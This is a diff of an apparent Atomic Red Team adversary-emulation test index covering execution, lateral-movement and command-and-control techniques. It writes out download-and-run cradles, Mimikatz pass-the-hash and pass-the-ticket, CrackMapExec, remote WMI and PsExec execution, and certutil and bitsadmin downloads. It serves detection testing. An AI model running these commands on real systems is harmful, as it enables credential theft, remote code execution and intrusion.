@@ -63596,15 +63596,15 @@ execution: dependencies: - description: 'SharpHound.ps1 must be located at #{file_path} - ' +' prereq_command: 'if (Test-Path #{file_path}\SharpHound.ps1) {exit 0} else {exit 1} - ' +' get_prereq_command: 'Invoke-WebRequest "https://raw.githubusercontent.com/BloodHoundAD/BloodHound/804503962b6dc554ad7d324cfa7f2b4a566a14e2/Ingestors/SharpHound.ps1" -OutFile "#{file_path}\SharpHound.ps1" - ' +' executor: command: | write-host "Import and Execution of SharpHound.ps1 from #{file_path}" -ForegroundColor Cyan @@ -63613,7 +63613,7 @@ execution: Start-Sleep 5 cleanup_command: 'Remove-Item $env:Temp\*BloodHound.zip -Force - ' +' name: powershell - name: Run Bloodhound from Memory using Download Cradle auto_generated_guid: bf8c1441-4674-4dab-8e4e-39d93d08f9b7 @@ -63631,7 +63631,7 @@ execution: Start-Sleep 5 cleanup_command: 'Remove-Item $env:Temp\*BloodHound.zip -Force - ' +' name: powershell - name: Obfuscation Tests auto_generated_guid: 4297c41a-8168-4138-972d-01f3ee92c804 @@ -63639,7 +63639,7 @@ execution: out to bit.ly/L3g1t and displays: "SUCCESSFULLY EXECUTED POWERSHELL CODE FROM REMOTE LOCATION" - ' +' supported_platforms: - windows executor: @@ -63654,7 +63654,7 @@ execution: will take place to open file explorer, open notepad and input code, then mimikatz dump info will be displayed. - ' +' supported_platforms: - windows executor: @@ -63685,7 +63685,7 @@ execution: command: 'Powershell.exe "IEX (New-Object Net.WebClient).DownloadString(''https://raw.githubusercontent.com/enigma0x3/Misc-PowerShell-Stuff/a0dfca7056ef20295b156b8207480dc2465f94c3/Invoke-AppPathBypass.ps1''); Invoke-AppPathBypass -Payload ''C:\Windows\System32\cmd.exe''" - ' +' name: command_prompt - name: Powershell MsXml COM object - with prompt auto_generated_guid: 388a7340-dbc1-4c9d-8e59-b75ad8c6d5da 
@@ -63705,7 +63705,7 @@ execution: MsXml2.ServerXmlHttp;$comMsXml.Open(''GET'',''#{url}'',$False);$comMsXml.Send();IEX $comMsXml.ResponseText" - ' +' name: command_prompt - name: Powershell XML requests auto_generated_guid: 4396927f-e503-427b-b023-31049b9b09a6 @@ -63725,7 +63725,7 @@ execution: bypass -noprofile "$Xml = (New-Object System.Xml.XmlDocument);$Xml.Load(''#{url}'');$Xml.command.a.execute | IEX" - ' +' name: command_prompt - name: Powershell invoke mshta.exe download auto_generated_guid: 8a2ad40b-12c7-4b25-8521-2737b0a415af @@ -63743,7 +63743,7 @@ execution: executor: command: 'C:\Windows\system32\cmd.exe /c "mshta.exe javascript:a=GetObject(''script:#{url}'').Exec();close()" - ' +' name: command_prompt - name: Powershell Invoke-DownloadCradle auto_generated_guid: cc50fa2a-a4be-42af-a88f-e347ba0bf4d7 @@ -63785,26 +63785,26 @@ execution: dependencies: - description: 'PowerShell version 2 must be installed - ' +' prereq_command: 'if(2 -in $PSVersionTable.PSCompatibleVersions.Major) {exit 0} else {exit 1} - ' +' get_prereq_command: 'Write-Host Automated installer not implemented yet, please install PowerShell v2 manually - ' +' executor: command: 'powershell.exe -version 2 -Command Write-Host $PSVersion - ' +' name: powershell - name: NTFS Alternate Data Stream Access auto_generated_guid: 8e5c5532-1181-4c1d-bb79-b3a9f5dbd680 description: 'Creates a file with an alternate data stream and simulates executing that hidden code/file. Upon execution, "Stream Data Executed" will be displayed. - ' +' supported_platforms: - windows input_arguments: @@ -63815,14 +63815,14 @@ execution: dependencies: - description: 'Homedrive must be an NTFS drive - ' +' prereq_command: 'if((Get-Volume -DriveLetter $env:HOMEDRIVE[0]).FileSystem -contains "NTFS") {exit 0} else {exit 1} - ' +' get_prereq_command: 'Write-Host Prereq''s for this test cannot be met automatically - ' +' executor: name: powershell command: | 
@@ -63831,7 +63831,7 @@ execution: Invoke-Expression $streamcommand cleanup_command: 'Remove-Item #{ads_file} -Force -ErrorAction Ignore - ' +' - name: PowerShell Session Creation and Use auto_generated_guid: 7c1acec2-78fa-4305-a3e0-db2a54cddecd description: | @@ -63848,12 +63848,12 @@ execution: dependencies: - description: 'PSRemoting must be enabled - ' +' prereq_command: "Try {\n New-PSSession -ComputerName #{hostname_to_connect} -ErrorAction Stop | Out-Null\n exit 0\n} \nCatch {\n exit 1\n}\n" get_prereq_command: 'Enable-PSRemoting - ' +' executor: name: powershell elevation_required: true @@ -63887,7 +63887,7 @@ execution: get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force - ' +' executor: command: 'Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type} -CommandParamVariation #{command_param_variation} -Execute -ErrorAction @@ -63923,7 +63923,7 @@ execution: get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force - ' +' executor: command: 'Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type} -CommandParamVariation #{command_param_variation} -UseEncodedArguments -EncodedArgumentsParamVariation @@ -63954,7 +63954,7 @@ execution: get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force - ' +' executor: command: 'Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type} -EncodedCommandParamVariation #{encoded_command_param_variation} -Execute @@ -63990,7 +63990,7 @@ execution: get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force - ' +' executor: command: 'Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type} -EncodedCommandParamVariation #{encoded_command_param_variation} -UseEncodedArguments 
@@ -64003,7 +64003,7 @@ execution: outputs "Hello, from PowerShell!". Example is from the 2021 Threat Detection Report by Red Canary. - ' +' supported_platforms: - windows input_arguments: @@ -64014,7 +64014,7 @@ execution: executor: command: 'powershell.exe -e #{obfuscated_code} - ' +' name: command_prompt - name: PowerShell Invoke Known Malicious Cmdlets auto_generated_guid: 49eb9404-5e0f-4031-a179-b40f7be385e3 @@ -64036,7 +64036,7 @@ execution: "PowerUp", "PowerView", "Remove-Comments", "Remove-VolumeShadowCopy", "Set-CriticalProcess", "Set-MasterBootRecord" - ' +' executor: name: powershell elevation_required: true @@ -64050,7 +64050,7 @@ execution: auto_generated_guid: 1289f78d-22d2-4590-ac76-166737e1811b description: 'Check for privilege escalation paths using PowerUp from PowerShellMafia - ' +' supported_platforms: - windows executor: @@ -64135,7 +64135,7 @@ execution: $which_python -c 'import requests' 2>/dev/null; echo $? get_prereq_command: 'pip install requests - ' +' executor: command: | which_python=$(which python || which python3 || which python2) @@ -64175,7 +64175,7 @@ execution: dependencies: - description: 'Requires Python - ' +' prereq_command: | which_python=$(which python || which python3 || which python2); $which_python -V $which_python -c 'import requests' 2>/dev/null; echo $? @@ -64202,7 +64202,7 @@ execution: an external malicious script then executes locally using the supplied executor and arguments - ' +' supported_platforms: - linux input_arguments: @@ -64236,7 +64236,7 @@ execution: dependencies: - description: 'Requires Python - ' +' prereq_command: | which_python=$(which python || which python3 || which python2); $which_python -V $which_python -c 'import requests' 2>/dev/null; echo $? @@ -64259,7 +64259,7 @@ execution: name: sh cleanup_command: 'rm #{python_binary_name} #{python_script_name} #{payload_file_name} - ' +' T1053.005: technique: created: '2019-11-27T14:58:00.429Z' 
@@ -64357,7 +64357,7 @@ execution: description: 'Upon successful execution, cmd.exe will create a scheduled task to spawn cmd.exe at 20:10. - ' +' supported_platforms: - windows input_arguments: @@ -64374,10 +64374,10 @@ execution: elevation_required: false command: 'SCHTASKS /Create /SC ONCE /TN spawn /TR #{task_command} /ST #{time} - ' +' cleanup_command: 'SCHTASKS /Delete /TN spawn /F >nul 2>&1 - ' +' - name: Scheduled task Remote auto_generated_guid: 2e5eac3e-327b-4a88-a0c0-c4057039a8dd description: | @@ -64413,11 +64413,11 @@ execution: command: 'SCHTASKS /Create /S #{target} /RU #{user_name} /RP #{password} /TN "Atomic task" /TR "#{task_command}" /SC daily /ST #{time} - ' +' cleanup_command: 'SCHTASKS /Delete /S #{target} /U #{user_name} /P #{password} /TN "Atomic task" /F >nul 2>&1 - ' +' - name: Powershell Cmdlet Scheduled Task auto_generated_guid: af9fd58f-c4ac-4bf2-a9ba-224b71ff25fd description: | @@ -64439,7 +64439,7 @@ execution: cleanup_command: 'Unregister-ScheduledTask -TaskName "AtomicTask" -confirm:$false >$null 2>&1 - ' +' - name: Task Scheduler via VBA auto_generated_guid: ecd3fa21-7792-41a2-8726-2c5c673414d3 description: | @@ -64456,7 +64456,7 @@ execution: dependencies: - description: 'Microsoft #{ms_product} must be installed - ' +' prereq_command: | try { New-Object -COMObject "#{ms_product}.Application" | Out-Null @@ -64467,7 +64467,7 @@ execution: get_prereq_command: 'Write-Host "You will need to install Microsoft #{ms_product} manually to meet this requirement" - ' +' executor: command: "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nIEX (iwr \"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1\" @@ -64480,7 +64480,7 @@ execution: login from XML by leveraging WMI class PS_ScheduledTask. Does the same thing as Register-ScheduledTask cmdlet behind the scenes. - ' +' supported_platforms: - windows executor: 
@@ -64492,7 +64492,7 @@ execution: cleanup_command: 'Unregister-ScheduledTask -TaskName "T1053_005_WMI" -confirm:$false >$null 2>&1 - ' +' T1053: technique: id: attack-pattern--35dd844a-b219-4e2b-a6bb-efa9a75995a9 @@ -64706,7 +64706,7 @@ execution: sc.exe delete #{service_name} cleanup_command: 'del C:\art-marker.txt >nul 2>&1 - ' +' name: command_prompt elevation_required: true - name: Use PsExec to execute a command on a remote host @@ -64740,10 +64740,10 @@ execution: - description: 'PsExec tool from Sysinternals must exist on disk at specified location (#{psexec_exe}) - ' +' prereq_command: 'if (Test-Path "#{psexec_exe}") { exit 0} else { exit 1} - ' +' get_prereq_command: | Invoke-WebRequest "https://download.sysinternals.com/files/PSTools.zip" -OutFile "$env:TEMP\PsTools.zip" Expand-Archive $env:TEMP\PsTools.zip $env:TEMP\PsTools -Force @@ -64753,7 +64753,7 @@ execution: command: '#{psexec_exe} \\#{remote_host} -u #{user_name} -p #{password} -accepteula "C:\Windows\System32\calc.exe" - ' +' name: command_prompt T1129: technique: @@ -64886,7 +64886,7 @@ execution: description: 'An adversary may use Radmin Viewer Utility to remotely control Windows device, this will start the radmin console. - ' +' supported_platforms: - windows input_arguments: @@ -64902,10 +64902,10 @@ execution: - description: 'Radmin Viewer Utility must be installed at specified location (#{radmin_exe}) - ' +' prereq_command: 'if not exist "#{radmin_exe}" (exit /b 1) - ' +' get_prereq_command: | echo Downloading radmin installer bitsadmin /transfer myDownloadJob /download /priority normal "https://www.radmin.com/download/Radmin_Viewer_3.5.2.1_EN.msi" #{radmin_installer} 
@@ -65128,20 +65128,20 @@ execution: dependencies: - description: 'Check if systemd-run exists on the machine - ' +' prereq_command: 'if [ -x "$(command -v systemd-run)" ]; then exit 0; else exit 1; fi; - ' +' get_prereq_command: 'echo "Install systemd on the machine."; exit 1; - ' +' executor: elevation_required: false command: 'systemd-run --user --unit=Atomic-Red-Team --on-calendar ''*:0/1'' /bin/sh -c ''echo "$(date) $(whoami)" >>/tmp/log'' - ' +' cleanup_command: | systemctl --user stop Atomic-Red-Team.service systemctl --user stop Atomic-Red-Team.timer @@ -65158,20 +65158,20 @@ execution: dependencies: - description: 'Check if systemd-run exists on the machine - ' +' prereq_command: 'if [ -x "$(command -v systemd-run)" ]; then exit 0; else exit 1; fi; - ' +' get_prereq_command: 'echo "Install systemd on the machine."; exit 1; - ' +' executor: elevation_required: true command: 'systemd-run --unit=Atomic-Red-Team --on-calendar ''*:0/1'' /bin/sh -c ''echo "$(date) $(whoami)" >>/tmp/log'' - ' +' cleanup_command: | systemctl stop Atomic-Red-Team.service systemctl stop Atomic-Red-Team.timer @@ -65238,7 +65238,7 @@ execution: auto_generated_guid: 7e7ac3ed-f795-4fa5-b711-09d6fbe9b873 description: 'Creates and executes a simple bash script. - ' +' supported_platforms: - macos - linux @@ -65255,7 +65255,7 @@ execution: sh #{script_path} cleanup_command: 'rm #{script_path} - ' +' name: sh - name: Command-Line Interface auto_generated_guid: d0c88567-803d-4dca-99b4-7ce65e7b257c @@ -65272,7 +65272,7 @@ execution: wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash cleanup_command: 'rm /tmp/art-fish.txt - ' +' name: sh T1204: technique: @@ -65429,7 +65429,7 @@ execution: dependencies: - description: 'The 64-bit version of Microsoft Office must be installed - ' +' prereq_command: | try { $wdApp = New-Object -COMObject "Word.Application" 
@@ -65440,7 +65440,7 @@ execution: get_prereq_command: 'Write-Host "You will need to install Microsoft Word (64-bit) manually to meet this requirement" - ' +' executor: command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 @@ -65449,7 +65449,7 @@ execution: cleanup_command: 'Get-WmiObject win32_process | Where-Object {$_.CommandLine -like "*mshta*"} | % { "$(Stop-Process $_.ProcessID)" } | Out-Null - ' +' name: powershell - name: Extract Memory via VBA auto_generated_guid: 8faff437-a114-4547-9a60-749652a03df6 @@ -65468,7 +65468,7 @@ execution: dependencies: - description: 'Microsoft #{ms_product} must be installed - ' +' prereq_command: | try { New-Object -COMObject "#{ms_product}.Application" | Out-Null @@ -65479,7 +65479,7 @@ execution: get_prereq_command: 'Write-Host "You will need to install Microsoft #{ms_product} manually to meet this requirement" - ' +' executor: command: "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nIEX (iwr \"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1\" @@ -65488,7 +65488,7 @@ execution: cleanup_command: 'Remove-Item "$env:TEMP\atomic_t1059_005_test_output.bin" -ErrorAction Ignore - ' +' name: powershell T1059.003: technique: @@ -65539,7 +65539,7 @@ execution: description: 'Creates and executes a simple batch script. Upon execution, CMD will briefly launch to run the batch script then close again. - ' +' supported_platforms: - windows input_arguments: 
@@ -65555,27 +65555,27 @@ execution: dependencies: - description: 'Batch file must exist on disk at specified location (#{script_path}) - ' +' prereq_command: 'if (Test-Path #{script_path}) {exit 0} else {exit 1} - ' +' get_prereq_command: | New-Item #{script_path} -Force | Out-Null Set-Content -Path #{script_path} -Value "#{command_to_execute}" executor: command: 'Start-Process #{script_path} - ' +' cleanup_command: 'Remove-Item #{script_path} -Force -ErrorAction Ignore - ' +' name: powershell - name: Writes text to a file and displays it. auto_generated_guid: 127b4afe-2346-4192-815c-69042bec570e description: 'Writes text to a file and display the results. This test is intended to emulate the dropping of a malicious file to disk. - ' +' supported_platforms: - windows input_arguments: @@ -65590,17 +65590,17 @@ execution: executor: command: 'echo "#{message}" > "#{file_contents_path}" & type "#{file_contents_path}" - ' +' cleanup_command: 'del "#{file_contents_path}" >nul 2>&1 - ' +' name: command_prompt - name: Suspicious Execution via Windows Command Shell auto_generated_guid: d0eb3597-a1b3-4d65-b33b-2cda8d397f20 description: 'Command line executed via suspicious invocation. Example is from the 2021 Threat Detection Report by Red Canary. - ' +' supported_platforms: - windows input_arguments: @@ -65691,7 +65691,7 @@ execution: executor: command: 'wmic useraccount get /ALL /format:csv - ' +' name: command_prompt - name: WMI Reconnaissance Processes auto_generated_guid: 5750aa16-0e59-4410-8b9a-8a47ca2788e2 @@ -65703,7 +65703,7 @@ execution: executor: command: 'wmic process get caption,executablepath,commandline /format:csv - ' +' name: command_prompt - name: WMI Reconnaissance Software auto_generated_guid: 718aebaa-d0e0-471a-8241-c5afa69c7414 
@@ -65715,7 +65715,7 @@ execution: executor: command: 'wmic qfe get description,installedOn /format:csv - ' +' name: command_prompt - name: WMI Reconnaissance List Remote Services auto_generated_guid: 0fd48ef7-d890-4e93-a533-f7dedd5191d3 @@ -65739,7 +65739,7 @@ execution: executor: command: 'wmic /node:"#{node}" service where (caption like "%#{service_search_string}%") - ' +' name: command_prompt - name: WMI Execute Local Process auto_generated_guid: b3bdfc91-b33e-4c6d-a5c8-d64bee0276b3 @@ -65756,11 +65756,11 @@ execution: executor: command: 'wmic process call create #{process_to_execute} - ' +' cleanup_command: 'wmic process where name=''#{process_to_execute}'' delete >nul 2>&1 - ' +' name: command_prompt - name: WMI Execute Remote Process auto_generated_guid: 9c8ef159-c666-472f-9874-90c8d60d136b @@ -65791,11 +65791,11 @@ execution: command: 'wmic /user:#{user_name} /password:#{password} /node:"#{node}" process call create #{process_to_execute} - ' +' cleanup_command: 'wmic /user:#{user_name} /password:#{password} /node:"#{node}" process where name=''#{process_to_execute}'' delete >nul 2>&1 - ' +' name: command_prompt - name: Create a Process using WMI Query and an Encoded Command auto_generated_guid: 7db7a7f9-9531-4840-9b30-46220135441c @@ -65812,7 +65812,7 @@ execution: executor: command: 'powershell -exec bypass -e SQBuAHYAbwBrAGUALQBXAG0AaQBNAGUAdABoAG8AZAAgAC0AUABhAHQAaAAgAHcAaQBuADMAMgBfAHAAcgBvAGMAZQBzAHMAIAAtAE4AYQBtAGUAIABjAHIAZQBhAHQAZQAgAC0AQQByAGcAdQBtAGUAbgB0AEwAaQBzAHQAIABuAG8AdABlAHAAYQBkAC4AZQB4AGUA - ' +' name: command_prompt - name: Create a Process using obfuscated Win32_Process auto_generated_guid: 10447c83-fc38-462a-a936-5102363b1c43 @@ -65846,7 +65846,7 @@ execution: description: 'This test uses wmic.exe to execute a DLL function using rundll32. Specify a valid value for remote IP using the node parameter. - ' +' supported_platforms: - windows input_arguments: 
@@ -65870,12 +65870,12 @@ execution: get_prereq_command: 'Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1047/bin/calc.dll?raw=true" -OutFile "#{dll_to_execute}" - ' +' executor: command: 'wmic /node:#{node} process call create "rundll32.exe #{dll_to_execute} #{function_to_execute}" - ' +' cleanup_command: taskkill /f /im calculator.exe name: powershell - name: Application uninstall using WMIC @@ -66198,7 +66198,7 @@ lateral-movement: command: '[activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.application","#{computer_name}")).Document.ActiveView.ExecuteShellCommand("c:\windows\system32\calc.exe", $null, $null, "7") - ' +' name: powershell T1210: technique: @@ -66451,7 +66451,7 @@ lateral-movement: - description: 'Mimikatz executor must exist on disk and at specified location (#{mimikatz_path}) - ' +' prereq_command: | $mimikatz_path = cmd /c echo #{mimikatz_path} if (Test-Path $mimikatz_path) {exit 0} else {exit 1} @@ -66466,13 +66466,13 @@ lateral-movement: command: '#{mimikatz_path} "sekurlsa::pth /user:#{user_name} /domain:#{domain} /ntlm:#{ntlm}" - ' +' name: command_prompt - name: crackmapexec Pass the Hash auto_generated_guid: eb05b028-16c8-4ad8-adea-6f5b219da9a9 description: 'command execute with crackmapexec - ' +' supported_platforms: - windows input_arguments: @@ -66501,14 +66501,14 @@ lateral-movement: - description: 'CrackMapExec executor must exist on disk at specified location (#{crackmapexec_exe}) - ' +' prereq_command: 'if(Test-Path #{crackmapexec_exe}) {exit 0} else {exit 1} - ' +' get_prereq_command: 'Write-Host Automated installer not implemented yet, please install crackmapexec manually at this location: #{crackmapexec_exe} - ' +' executor: command: "#{crackmapexec_exe} #{domain} -u #{user_name} -H #{ntlm} -x #{command}\n" name: command_prompt 
@@ -66589,7 +66589,7 @@ lateral-movement: auto_generated_guid: dbf38128-7ba7-4776-bedf-cc2eed432098 description: 'Similar to PTH, but attacking Kerberos - ' +' supported_platforms: - windows input_arguments: @@ -66597,7 +66597,7 @@ lateral-movement: description: Ticket file name usually format of 'id-username\@domain.kirbi' (e.g. can be dumped by "sekurlsa::tickets /export" module) type: String - default: + default: mimikatz_exe: description: Path of the Mimikatz binary type: Path @@ -66606,10 +66606,10 @@ lateral-movement: dependencies: - description: 'Mimikatz must exist on disk at specified location (#{mimikatz_exe}) - ' +' prereq_command: 'if (Test-Path #{mimikatz_exe}) {exit 0} else {exit 1} - ' +' get_prereq_command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 $mimikatz_relative_uri = Invoke-WebRequest "https://github.com/gentilkiwi/mimikatz/releases/latest" -UseBasicParsing | Select-Object -ExpandProperty Links | Where-Object -Property href -Like "*/mimikatz_trunk.zip" | Select-Object -ExpandProperty href @@ -66620,7 +66620,7 @@ lateral-movement: executor: command: '#{mimikatz_exe} "kerberos::ptt #{ticket}" - ' +' name: command_prompt - name: Rubeus Kerberos Pass The Ticket auto_generated_guid: a2fc4ec5-12c6-4fb4-b661-961f23f359cb @@ -66663,19 +66663,19 @@ lateral-movement: dependencies: - description: 'Rubeus must exist on disk at specified location (#{rubeus_path}) - ' +' prereq_command: 'if (Test-Path #{rubeus_path}) {exit 0} else {exit 1} - ' +' get_prereq_command: 'Invoke-Webrequest -Uri #{rubeus_url} -OutFile #{rubeus_path} - ' +' - description: 'PsExec must exist on disk at specified location (#{psexec_path}) - ' +' prereq_command: 'if (Test-Path #{psexec_path}) {exit 0} else {exit 1} - ' +' get_prereq_command: | Invoke-WebRequest "https://download.sysinternals.com/files/PSTools.zip" -OutFile "$env:TEMP\PsTools.zip" Expand-Archive $env:TEMP\PsTools.zip $env:TEMP\PsTools -Force 
@@ -66769,7 +66769,7 @@ lateral-movement: net start sesshijack cleanup_command: 'sc.exe delete sesshijack >nul 2>&1 - ' +' name: command_prompt elevation_required: true T1021.001: @@ -66841,7 +66841,7 @@ lateral-movement: auto_generated_guid: 355d4632-8cb9-449d-91ce-b566d0253d3e description: 'Attempt an RDP session via Remote Desktop Application to a DomainController. - ' +' supported_platforms: - windows input_arguments: @@ -66864,15 +66864,15 @@ lateral-movement: dependencies: - description: 'Computer must be domain joined - ' +' prereq_command: 'if((Get-CIMInstance -Class Win32_ComputerSystem).PartOfDomain) { exit 0} else { exit 1} - ' +' get_prereq_command: 'Write-Host Joining this computer to a domain must be done manually - ' +' executor: command: | $Server=#{logonserver} @@ -66889,7 +66889,7 @@ lateral-movement: auto_generated_guid: 7382a43e-f19c-46be-8f09-5c63af7d3e2b description: 'Attempt an RDP session via Remote Desktop Application over Powershell - ' +' supported_platforms: - windows input_arguments: @@ -66922,7 +66922,7 @@ lateral-movement: description: 'Changing RDP Port to Non Standard Port via Remote Desktop Application over Powershell - ' +' supported_platforms: - windows input_arguments: @@ -66946,7 +66946,7 @@ lateral-movement: auto_generated_guid: 74ace21e-a31c-4f7d-b540-53e4eb6d1f73 description: 'Changing RDP Port to Non Standard Port via Command_Prompt - ' +' supported_platforms: - windows input_arguments: @@ -67227,7 +67227,7 @@ lateral-movement: auto_generated_guid: 3386975b-367a-4fbb-9d77-4dcf3639ffd3 description: 'Connecting To Remote Shares - ' +' supported_platforms: - windows input_arguments: 
@@ -67251,13 +67251,13 @@ lateral-movement: command: 'cmd.exe /c "net use \\#{computer_name}\#{share_name} #{password} /u:#{user_name}" - ' +' name: command_prompt - name: Map Admin Share PowerShell auto_generated_guid: 514e9cd7-9207-4882-98b1-c8f791bae3c5 description: 'Map Admin share utilizing PowerShell - ' +' supported_platforms: - windows input_arguments: @@ -67276,14 +67276,14 @@ lateral-movement: executor: command: 'New-PSDrive -name #{map_name} -psprovider filesystem -root \\#{computer_name}\#{share_name} - ' +' name: powershell - name: Copy and Execute File with PsExec auto_generated_guid: 0eb03d41-79e4-4393-8e57-6344856be1cf description: 'Copies a file to a remote host and executes it using PsExec. Requires the download of PsExec from [https://docs.microsoft.com/en-us/sysinternals/downloads/psexec](https://docs.microsoft.com/en-us/sysinternals/downloads/psexec). - ' +' supported_platforms: - windows input_arguments: @@ -67304,10 +67304,10 @@ lateral-movement: - description: 'PsExec tool from Sysinternals must exist on disk at specified location (#{psexec_exe}) - ' +' prereq_command: 'if (Test-Path "#{psexec_exe}") { exit 0} else { exit 1} - ' +' get_prereq_command: | Invoke-WebRequest "https://download.sysinternals.com/files/PSTools.zip" -OutFile "$env:TEMP\PsTools.zip" Expand-Archive $env:TEMP\PsTools.zip $env:TEMP\PsTools -Force @@ -67337,7 +67337,7 @@ lateral-movement: command: 'cmd.exe /Q /c #{command_to_execute} 1> \\127.0.0.1\ADMIN$\#{output_file} 2>&1 - ' +' name: command_prompt elevation_required: true T1021.004: @@ -67568,7 +67568,7 @@ lateral-movement: description: 'An adversary may use Radmin Viewer Utility to remotely control Windows device, this will start the radmin console. - ' +' supported_platforms: - windows input_arguments: 
@@ -67584,10 +67584,10 @@ lateral-movement: - description: 'Radmin Viewer Utility must be installed at specified location (#{radmin_exe}) - ' +' prereq_command: 'if not exist "#{radmin_exe}" (exit /b 1) - ' +' get_prereq_command: | echo Downloading radmin installer bitsadmin /transfer myDownloadJob /download /priority normal "https://www.radmin.com/download/Radmin_Viewer_3.5.2.1_EN.msi" #{radmin_installer} @@ -67880,7 +67880,7 @@ lateral-movement: executor: command: 'Enable-PSRemoting -Force - ' +' name: powershell elevation_required: true - name: Invoke-Command @@ -67903,7 +67903,7 @@ lateral-movement: executor: command: 'invoke-command -ComputerName #{host_name} -scriptblock {#{remote_command}} - ' +' name: powershell - name: WinRM Access with Evil-WinRM auto_generated_guid: efe86d95-44c4-4509-ae42-7bfd9d1f5b3d @@ -68264,7 +68264,7 @@ command-and-control: "#{query_type}" "#{subdomain}.$(Get-Random -Minimum 1 -Maximum 999999).#{domain}" -QuickTimeout} - ' +' name: powershell - name: DNS Regular Beaconing auto_generated_guid: 3efc144e-1af8-46bb-8ca2-1376bb6db8b6 @@ -69062,7 +69062,7 @@ command-and-control: auto_generated_guid: 0fc6e977-cb12-44f6-b263-2824ba917409 description: 'Utilize rsync to perform a remote file copy (push) - ' +' supported_platforms: - linux - macos @@ -69086,13 +69086,13 @@ command-and-control: executor: command: 'rsync -r #{local_path} #{username}@#{remote_host}:#{remote_path} - ' +' name: bash - name: rsync remote file copy (pull) auto_generated_guid: 3180f7d5-52c0-4493-9ea0-e3431a84773f description: 'Utilize rsync to perform a remote file copy (pull) - ' +' supported_platforms: - linux - macos @@ -69116,13 +69116,13 @@ command-and-control: executor: command: 'rsync -r #{username}@#{remote_host}:#{remote_path} #{local_path} - ' +' name: bash - name: scp remote file copy (push) auto_generated_guid: 83a49600-222b-4866-80a0-37736ad29344 description: 'Utilize scp to perform a remote file copy (push) - ' +' supported_platforms: - linux - macos 
@@ -69146,13 +69146,13 @@ command-and-control: executor: command: 'scp #{local_file} #{username}@#{remote_host}:#{remote_path} - ' +' name: bash - name: scp remote file copy (pull) auto_generated_guid: b9d22b9a-9778-4426-abf0-568ea64e9c33 description: 'Utilize scp to perform a remote file copy (pull) - ' +' supported_platforms: - linux - macos @@ -69176,13 +69176,13 @@ command-and-control: executor: command: 'scp #{username}@#{remote_host}:#{remote_file} #{local_path} - ' +' name: bash - name: sftp remote file copy (push) auto_generated_guid: f564c297-7978-4aa9-b37a-d90477feea4e description: 'Utilize sftp to perform a remote file copy (push) - ' +' supported_platforms: - linux - macos @@ -69206,13 +69206,13 @@ command-and-control: executor: command: 'sftp #{username}@#{remote_host}:#{remote_path} <<< $''put #{local_file}'' - ' +' name: bash - name: sftp remote file copy (pull) auto_generated_guid: '0139dba1-f391-405e-a4f5-f3989f2c88ef' description: 'Utilize sftp to perform a remote file copy (pull) - ' +' supported_platforms: - linux - macos @@ -69236,14 +69236,14 @@ command-and-control: executor: command: 'sftp #{username}@#{remote_host}:#{remote_file} #{local_path} - ' +' name: bash - name: certutil download (urlcache) auto_generated_guid: dd3b61dd-7bbc-48cd-ab51-49ad1a776df0 description: 'Use certutil -urlcache argument to download a file from the web. Note - /urlcache also works! - ' +' supported_platforms: - windows input_arguments: @@ -69258,17 +69258,17 @@ command-and-control: executor: command: 'cmd /c certutil -urlcache -split -f #{remote_file} #{local_path} - ' +' cleanup_command: 'del #{local_path} >nul 2>&1 - ' +' name: command_prompt - name: certutil download (verifyctl) auto_generated_guid: ffd492e3-0455-4518-9fb1-46527c9f241b description: 'Use certutil -verifyctl argument to download a file from the web. Note - /verifyctl also works! - ' +' supported_platforms: - windows input_arguments: 
@@ -69290,7 +69290,7 @@ command-and-control: cleanup_command: 'Remove-Item "certutil-$(Get-Date -format yyyy_MM_dd)" -Force -Recurse -ErrorAction Ignore - ' +' name: powershell - name: Windows - BITSAdmin BITS Download auto_generated_guid: a1921cd3-9a2d-47d5-a891-f1d0f2a7a31b @@ -69316,7 +69316,7 @@ command-and-control: command: 'C:\Windows\System32\bitsadmin.exe /transfer #{bits_job_name} /Priority HIGH #{remote_file} #{local_path} - ' +' name: command_prompt - name: Windows - PowerShell Download auto_generated_guid: 42dc4460-9aa6-45d3-b1a6-3955d34e1fe8 @@ -69338,17 +69338,17 @@ command-and-control: command: '(New-Object System.Net.WebClient).DownloadFile("#{remote_file}", "#{destination_path}") - ' +' cleanup_command: 'Remove-Item #{destination_path} -Force -ErrorAction Ignore - ' +' name: powershell - name: OSTAP Worming Activity auto_generated_guid: 2ca61766-b456-4fcf-a35a-1233685e1cad description: 'OSTap copies itself in a specfic way to shares and secondary drives. This emulates the activity. - ' +' supported_platforms: - windows input_arguments: @@ -69425,7 +69425,7 @@ command-and-control: auto_generated_guid: c99a829f-0bb8-4187-b2c6-d47d1df74cab description: 'Download a remote file using the whois utility - ' +' supported_platforms: - linux - macos 
